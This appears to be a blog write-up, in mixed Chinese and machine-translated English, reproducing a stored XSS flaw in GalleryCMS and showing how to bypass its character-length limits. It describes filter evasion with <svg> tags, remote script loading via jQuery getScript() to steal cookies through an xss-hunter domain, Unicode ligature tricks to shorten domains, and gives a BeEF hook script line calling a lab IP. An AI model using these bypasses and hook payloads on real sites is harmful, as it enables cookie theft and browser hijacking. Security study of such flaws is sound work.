当前位置：网站首页>XSS holes emersion

XSS holes emersion

2022-08-03 21:11:00 【hug kitten】

XSS复现GalleryCMSCharacter length limit short domain name bypass

第一步：First upload a string at will,See where the string was last entered

第二步：Let's test it again to see if it worksJS代码

第三步：使用getScript()函数绕过

第四步：beef复现GalleryCMS20character limit short domain name bypass

XSS复现GalleryCMSCharacter length limit short domain name bypass

We build it firstgalleryCMS的服务器.

第一步：First upload a string at will,See where the string was last entered

The data we uploaded can be seen in the database

第二步：Let's test it again to see if it worksJS代码

displayed in the database as,这说明对JS代码有限制,As a result, we can't make the pop-up window

我们查看一下源码,It can be seen that he did length to us45,And filter a lot of tags and other restrictions

But it can be seen from the source code that there is nothing right<svg>标签进行限制,所以我们尝试使用<svg>Whether the label test can be bypassed

绕过成功：

第三步：使用getScript()函数绕过

We found through this page that the web page is using jQuery框架,我们尝试使用getScript()Try bypassing the function.

getScript()函数：使用 AJAX 的 HTTP GET 请求获取和执行 JavaScript.

语法：(selector).getScript(url,success(response,status))

参数	描述
url	必需.规定将请求发送到哪个 URL.
success(response,status)	可选.规定当请求成功时运行的函数. 额外的参数： response - 包含来自请求的结果数据 status - 包含请求的状态（"success"、"notmodified"、"error"、"timeout"、"parsererror"）

我们尝试将<svg>标签和getScriptGet it togethercookie值

我们使用了xss-hunterA page allocated to the system,telsm.xss.htThere are many functions for obtaining information,Requires registration and has a custom onexss.htOnly subdomains can be used,But I didn't register the domain name,So I can't see the obtained message,But it also means success.

第四步：beef复现GalleryCMS20character limit short domain name bypass

We changed the maximum character limit length to 20个字符,利用beeftools try to bypass

But the basic commands will be over20个字符

由于字符长度限制,How to achieve bypass？

1、使用Unicode编码进行编码,UnicodeThe encoding has several special characters,如tel在UnicodeOnly one character is counted in

2、域名重定向-->Domestic domain name redirection requires filing,Only foreign domain names can be used

We use the first methodUnicodeThe encoding is bypassed with special characters

℠ expands to sm
㏛ expands to sr
ﬆ expands to st
㎭ expands to rad
℡ expands to tel

我们先打开beef-xss：

登陆beef的网页端,beef的用户名和密码在/etc/beef-xss/config.yml文件下查看

把hook.jsThe contents of the file are copied to the server/var/www/html/index.html文件下,Because I don't have my own domain name,So I can modify the configuration file by myself,使用ip进行测试<script src="//192.168.112.131:3000/hoot.js">

成功了